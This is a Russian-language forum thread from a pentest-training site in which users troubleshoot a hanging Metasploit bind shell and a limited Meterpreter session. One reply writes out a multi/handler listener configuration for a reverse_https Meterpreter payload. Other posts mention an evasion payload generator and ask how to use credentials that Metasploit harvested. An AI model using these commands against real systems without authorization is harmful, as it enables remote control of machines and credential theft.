• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Проблема Не работает shell

Elektrolife

Green Team
21.10.2016
208
33
BIT
6
Всем привет!

Проблема следующая: на уязвимой машине поднимаю шелл ( windows/shell/bind_tcp). При попытке подключения метасплоит повисает в неопределенном состоянии и не даёт делать никаких действий кроме как выйти из сессии (ctr+c). Повысить сессию до meterpreter тоже завершается неудачей.

В чём может быть проблема ?

1517987100204.png


1517987188674.png


---- Добавлено позже ----

Каким то чудом пробился в сессию MP,но меню как то не очень похоже на привычное,сильно урезан функционал ( Почему ?

1517988816162.png


Посмотреть вложение 15523
 
Последнее редактирование:

Elektrolife

Green Team
21.10.2016
208
33
BIT
6
пробовал reverse_tcp вместо этого?

у меня нет статики,а через no-ip почему то сразу резолвит локальный адрес и не хочет обращаться через ddns

Ещё очень интересно,что это за урезанная версия МП и почему не работают команды
 

woolf1514

Green Team
06.03.2017
181
191
BIT
1

Elektrolife

Green Team
21.10.2016
208
33
BIT
6
так это вообще не МП)


По запросу session показывает что meterpreter ) По факту я думаю,что эксплоит отрабатывает но как то неправильно. Потому что сканнер показывает,что цель не подвержена эксплойту SMB,но тем не менее сессии прилетают )
 

kot-gor

Grey Team
07.09.2016
529
705
BIT
0
вообще это метерпретер...решили свою проблему?
 

kot-gor

Grey Team
07.09.2016
529
705
BIT
0
дело не в полезной нагрузке..а в метасплойте самом...сам сталкивался с данным чудом.
у меня такое случалось когда настраивал ssl шифрования, и запускал листенер в фоном режиме , т.е exploit -J
 

Elektrolife

Green Team
21.10.2016
208
33
BIT
6
вообще это метерпретер...решили свою проблему?

Не,так и не заработало (

---- Добавлено позже ----

Хм, юзай phantom-evasion и не парься)

Что есть phantom-evasion ? ) Предполагаю - генератор полезной нагрузки.

Тут проблема скорее в адекватном приёме сессии
 
Последнее редактирование:
O

OneDollar

Не,так и не заработало (

---- Добавлено позже ----



Что есть phantom-evasion ? ) Предполагаю - генератор полезной нагрузки.

Тут проблема скорее в адекватном приёме сессии
Читай)Тык.. не ну если криво летит, то тут уже не в этом дело.. ты уверен что проброс портов в поряде и тд?
 

kot-gor

Grey Team
07.09.2016
529
705
BIT
0
у вас мертвая сессия..одна из причин неправильные настройки листенера.Вы в локальной сети проводили тестирование, или с внешней.?
 

kot-gor

Grey Team
07.09.2016
529
705
BIT
0
вы использовали ReverseListenerBindAddress в листенере?
скиньте мне ваш листенер, более чем уверен вы там ошиблись.Дело в том, что если вы тестируете через роутер с белым статическим айпи настройки листенера немного другие..примерно так:

msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (внешний ip)
msf exploit (handler) > set LPORT 4444
msf exploit (handler) > set ReverseListenerBindAddress (внутренний IP)
msf exploit (handler) >exploit -j
 
  • Нравится
Реакции: Vertigo

Elektrolife

Green Team
21.10.2016
208
33
BIT
6
вы использовали ReverseListenerBindAddress в листенере?
скиньте мне ваш листенер, более чем уверен вы там ошиблись.Дело в том, что если вы тестируете через роутер с белым статическим айпи настройки листенера немного другие..примерно так:

msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (внешний ip)
msf exploit (handler) > set LPORT 4444
msf exploit (handler) > set ReverseListenerBindAddress (внутренний IP)
msf exploit (handler) >exploit -j

блин,не могу найти теперь таргет,после него забабахал уже кучу других... По факту - я точно не указывал ReverseListenerBindAddress )

немножко оффтоп:

метасплоит накопал некоторое количество кредов,но я никак не пойму,как ими воспользоваться ) В браузере по указанным портам не выдаёт форму логина\пароля... Как он проверил их на валидность ?

1520417714474.png
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!